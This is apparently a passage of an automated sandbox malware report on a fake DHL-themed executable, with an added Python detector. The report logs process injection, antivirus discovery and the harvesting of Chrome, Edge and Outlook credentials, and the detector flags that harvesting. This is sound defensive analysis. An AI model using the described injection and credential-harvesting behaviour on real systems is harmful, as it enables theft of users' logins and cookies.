            Source: C:\Users\user\Desktop\DHL 0737-12182024.exe | Code function: 0_2_00852622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exe | Code function: 0_2_0084083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exe | Code function: 0_2_008409D5 SetUnhandledExceptionFilter
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exe | Code function: 0_2_00840C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe | NtAllocateVirtualMemory: Direct from: 0x76EF48EC
            Source: C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe | NtQueryAttributesFile: Direct from: 0x76EF2E6C
            Source: C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe | NtQueryVolumeInformationFile: Direct from: 0x76EF2F2C
            Source: C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe | NtQuerySystemInformation: Direct from: 0x76EF48CC
            Source: C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe | NtOpenSection: Direct from: 0x76EF2E0C
            Source: C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe | NtDeviceIoControlFile: Direct from: 0x76EF2AEC
            Source: C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe | NtAllocateVirtualMemory: Direct from: 0x76EF2BEC
            Source: C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe | NtQueryInformationToken: Direct from: 0x76EF2CAC
            Source: C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe | NtCreateFile: Direct from: 0x76EF2FEC
            Source: C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe | NtOpenFile: Direct from: 0x76EF2DCC
            Source: C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe | NtTerminateThread: Direct from: 0x76EF2FCC
            Source: C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe | NtOpenKeyEx: Direct from: 0x76EF2B9C
            Source: C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe | NtSetInformationProcess: Direct from: 0x76EF2C5C
            Source: C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe | NtProtectVirtualMemory: Direct from: 0x76EF2F9C
            Source: C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe | NtWriteVirtualMemory: Direct from: 0x76EF2E3C
            Source: C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe | NtNotifyChangeKey: Direct from: 0x76EF3C2C
            Source: C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe | NtCreateMutant: Direct from: 0x76EF35CC
            Source: C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe | NtResumeThread: Direct from: 0x76EF36AC
            Source: C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe | NtMapViewOfSection: Direct from: 0x76EF2D1C
            Source: C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe | NtProtectVirtualMemory: Direct from: 0x76EE7B2E
            Source: C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe | NtAllocateVirtualMemory: Direct from: 0x76EF2BFC
            Source: C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe | NtQuerySystemInformation: Direct from: 0x76EF2DFC
            Source: C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe | NtReadFile: Direct from: 0x76EF2ADC
            Source: C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe | NtDelayExecution: Direct from: 0x76EF2DDC
            Source: C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe | NtQueryInformationProcess: Direct from: 0x76EF2C26
            Source: C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe | NtResumeThread: Direct from: 0x76EF2FBC
            Source: C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe | NtCreateUserProcess: Direct from: 0x76EF371C
            Source: C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe | NtAllocateVirtualMemory: Direct from: 0x76EF3C9C
            Source: C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe | NtWriteVirtualMemory: Direct from: 0x76EF490C
            Source: C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe | NtSetInformationThread: Direct from: 0x76EE63F9
            Source: C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe | NtClose: Direct from: 0x76EF2B6C
            Source: C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe | NtSetInformationThread: Direct from: 0x76EF2B4C
            Source: C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe | NtReadVirtualMemory: Direct from: 0x76EF2E8C
            Source: C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe | NtCreateKey: Direct from: 0x76EF2C6C
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\netbtugc.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: NULL target: C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe protection: read write
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: NULL target: C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\netbtugc.exe | Thread register set: target process: 7056
            Source: C:\Windows\SysWOW64\netbtugc.exe | Thread APC queued: target process: C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 2FDE008
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exe | Code function: 0_2_00881201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exe | Code function: 0_2_00862BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exe | Code function: 0_2_0088B226 SendInput,keybd_event
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exe | Code function: 0_2_008A22DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\DHL 0737-12182024.exe"
            Source: C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe | Process created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"
            Source: C:\Windows\SysWOW64\netbtugc.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exe | Code function: 0_2_00880B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exe | Code function: 0_2_00881663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid
            Source: DHL 0737-12182024.exe | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
            Source: MPhqOtiHUlL.exe, 00000003.00000000.2144852254.0000000000F81000.00000002.00000001.00040000.00000000.sdmp, MPhqOtiHUlL.exe, 00000003.00000002.4524222948.0000000000F81000.00000002.00000001.00040000.00000000.sdmp, MPhqOtiHUlL.exe, 00000006.00000002.4524417766.0000000001181000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Program Manager
            Source: DHL 0737-12182024.exe, MPhqOtiHUlL.exe, 00000003.00000000.2144852254.0000000000F81000.00000002.00000001.00040000.00000000.sdmp, MPhqOtiHUlL.exe, 00000003.00000002.4524222948.0000000000F81000.00000002.00000001.00040000.00000000.sdmp, MPhqOtiHUlL.exe, 00000006.00000002.4524417766.0000000001181000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
            Source: MPhqOtiHUlL.exe, 00000003.00000000.2144852254.0000000000F81000.00000002.00000001.00040000.00000000.sdmp, MPhqOtiHUlL.exe, 00000003.00000002.4524222948.0000000000F81000.00000002.00000001.00040000.00000000.sdmp, MPhqOtiHUlL.exe, 00000006.00000002.4524417766.0000000001181000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
            Source: MPhqOtiHUlL.exe, 00000003.00000000.2144852254.0000000000F81000.00000002.00000001.00040000.00000000.sdmp, MPhqOtiHUlL.exe, 00000003.00000002.4524222948.0000000000F81000.00000002.00000001.00040000.00000000.sdmp, MPhqOtiHUlL.exe, 00000006.00000002.4524417766.0000000001181000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exe | Code function: 0_2_00840698 cpuid
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exe | Code function: 0_2_00898195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exe | Code function: 0_2_0087D27A GetUserNameW
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exe | Code function: 0_2_0085B952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exe | Code function: 0_2_008242DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo
            Source: DHL 0737-12182024.exe, 00000000.00000002.2075973044.0000000000C17000.00000004.00000020.00020000.00000000.sdmp, DHL 0737-12182024.exe, 00000000.00000003.2051299371.0000000000C17000.00000004.00000020.00020000.00000000.sdmp, DHL 0737-12182024.exe, 00000000.00000003.2051183817.0000000000BA9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: msmpeng.exe
            Source: DHL 0737-12182024.exe, 00000000.00000002.2075973044.0000000000C17000.00000004.00000020.00020000.00000000.sdmp, DHL 0737-12182024.exe, 00000000.00000003.2051299371.0000000000C17000.00000004.00000020.00020000.00000000.sdmp, DHL 0737-12182024.exe, 00000000.00000003.2051183817.0000000000BA9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: mcupdate.exe

            Stealing of Sensitive Information

Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000002.4523238196.0000000002C10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.4524618858.00000000030E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2226323346.0000000003710000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.4526783594.0000000004EA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2225605698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.4524568253.00000000030A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.4524627388.0000000004530000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2227031882.0000000005E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\netbtugc.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Source: DHL 0737-12182024.exe | Binary or memory string: WIN_81
Source: DHL 0737-12182024.exe | Binary or memory string: WIN_XP
Source: DHL 0737-12182024.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: DHL 0737-12182024.exe | Binary or memory string: WIN_XPe
Source: DHL 0737-12182024.exe | Binary or memory string: WIN_VISTA
Source: DHL 0737-12182024.exe | Binary or memory string: WIN_7
Source: DHL 0737-12182024.exe | Binary or memory string: WIN_8
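The file and registry opens listed above are the raw evidence behind the two credential-theft signatures: a binary running out of SysWOW64 walks the Chromium credential stores of Chrome and Edge and then the Outlook profile key. The Python below is an added example, not part of the Joe Sandbox report, that turns that access pattern into a detection over file-open and key-open events: any process other than the owning browser or mail client touching a Chromium "Login Data", "Cookies", "Web Data" or "Local State" file, or the Outlook profile subtree, is flagged. The event records, the ALLOWED_OWNERS list and the chrome.exe control row are constructed for the example; the target paths are the ones the report shows.

```python
"""Flag processes that open browser credential stores or the Outlook
profile key, the access pattern the report records for netbtugc.exe.
Added example, not part of the Joe Sandbox report; the events below are
constructed from the paths in the report and are not real telemetry."""
import re
from dataclasses import dataclass

# Chromium files holding saved logins, cookies, autofill data and the
# DPAPI-wrapped key ("Local State") needed to decrypt the saved logins.
SENSITIVE_FILE_RE = re.compile(
    r"\\(Google\\Chrome|Microsoft\\Edge)\\User Data\\.*\\(Login Data|Cookies|Web Data|Local State)$",
    re.IGNORECASE,
)
# Outlook (MAPI) profile subtree that holds stored mail account settings.
OUTLOOK_PROFILE_RE = re.compile(
    r"^HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\",
    re.IGNORECASE,
)
# Image-path suffixes of processes with a legitimate reason to open these
# stores (assumption for the example; tune to the fleet's install paths).
ALLOWED_OWNERS = (
    r"\google\chrome\application\chrome.exe",
    r"\microsoft\edge\application\msedge.exe",
    r"\microsoft office\root\office16\outlook.exe",
)


@dataclass(frozen=True)
class Event:
    process: str  # full image path of the accessing process
    op: str       # "file_open" or "key_open"
    target: str   # file path or registry key that was opened


def is_allowed(process: str) -> bool:
    """True when the process is one of the legitimate owners of the store."""
    p = process.lower()
    return any(p.endswith(owner) for owner in ALLOWED_OWNERS)


def find_credential_access(events):
    """Return (process, target) pairs where a non-owner opened a store."""
    hits = []
    for ev in events:
        if is_allowed(ev.process):
            continue
        if ev.op == "file_open" and SENSITIVE_FILE_RE.search(ev.target):
            hits.append((ev.process, ev.target))
        elif ev.op == "key_open" and OUTLOOK_PROFILE_RE.match(ev.target):
            hits.append((ev.process, ev.target))
    return hits


def summarize(events):
    """Group hits per process so one alert covers a whole harvesting sweep."""
    per_proc = {}
    for proc, target in find_credential_access(events):
        per_proc.setdefault(proc, []).append(target)
    return per_proc


# Constructed sample events. The first five reproduce the report's accesses;
# the chrome.exe row is a benign control and the Temp row an unrelated open.
SAMPLE_EVENTS = [
    Event(r"C:\Windows\SysWOW64\netbtugc.exe", "file_open",
          r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
    Event(r"C:\Windows\SysWOW64\netbtugc.exe", "file_open",
          r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies"),
    Event(r"C:\Windows\SysWOW64\netbtugc.exe", "file_open",
          r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State"),
    Event(r"C:\Windows\SysWOW64\netbtugc.exe", "file_open",
          r"C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data"),
    Event(r"C:\Windows\SysWOW64\netbtugc.exe", "key_open",
          "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\"),
    Event(r"C:\Program Files\Google\Chrome\Application\chrome.exe", "file_open",
          r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
    Event(r"C:\Windows\SysWOW64\netbtugc.exe", "file_open",
          r"C:\Users\user\AppData\Local\Temp\scratch.tmp"),
]

if __name__ == "__main__":
    for proc, targets in summarize(SAMPLE_EVENTS).items():
        print(f"{proc}: {len(targets)} credential-store access(es)")
        for target in targets:
            print("    ", target)
```

The same logic runs unchanged over Sysmon-style file-create or EDR file-open records once they are mapped onto Event. Grouping per process matters in practice: a single open of "Local State" by an updater is noise, while one process opening "Login Data", "Cookies" and "Local State" in sequence, as netbtugc.exe does here, is the harvesting pattern worth paging on, because "Local State" carries the key that makes the copied "Login Data" usable offline.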

            Remote Access Functionality

Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000002.4523238196.0000000002C10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.4524618858.00000000030E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2226323346.0000000003710000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.4526783594.0000000004EA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2225605698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.4524568253.00000000030A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.4524627388.0000000004530000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2227031882.0000000005E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\DHL 0737-12182024.exe | Code function: 0_2_008A1204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket, | 0_2_008A1204
Source: C:\Users\user\Desktop\DHL 0737-12182024.exe | Code function: 0_2_008A1806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, | 0_2_008A1806
MITRE ATT&CK matrix (the numbers the report attaches to a technique are kept in parentheses)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: Valid Accounts (2); Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: Native API (1); Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: DLL Side-Loading (1); Valid Accounts (2); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: Exploitation for Privilege Escalation (1); Abuse Elevation Control Mechanism (1); DLL Side-Loading (1); Valid Accounts (2); Access Token Manipulation (21); Process Injection (412); Startup Items; Scheduled Task/Job; At
Defense Evasion: Disable or Modify Tools (1); Deobfuscate/Decode Files or Information (1); Abuse Elevation Control Mechanism (1); Obfuscated Files or Information (2); DLL Side-Loading (1); Valid Accounts (2); Virtualization/Sandbox Evasion (12); Access Token Manipulation (21); Process Injection (412)
Credential Access: OS Credential Dumping (1); Input Capture (21); Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: System Time Discovery (2); Account Discovery (1); File and Directory Discovery (2); System Information Discovery (116); Security Software Discovery (251); Virtualization/Sandbox Evasion (12); Process Discovery (3); Application Window Discovery (11); System Owner/User Discovery (1)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: Archive Collected Data (1); Data from Local System (1); Email Collection (1); Input Capture (21); Clipboard Data (3); GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: Ingress Tool Transfer (4); Encrypted Channel (1); Non-Application Layer Protocol (4); Application Layer Protocol (4); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: System Shutdown/Reboot (1); Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
Behavior Graph ID: 1578024 | Sample: DHL 0737-12182024.exe | Start date: 19/12/2024 | Architecture: WINDOWS | Score: 100

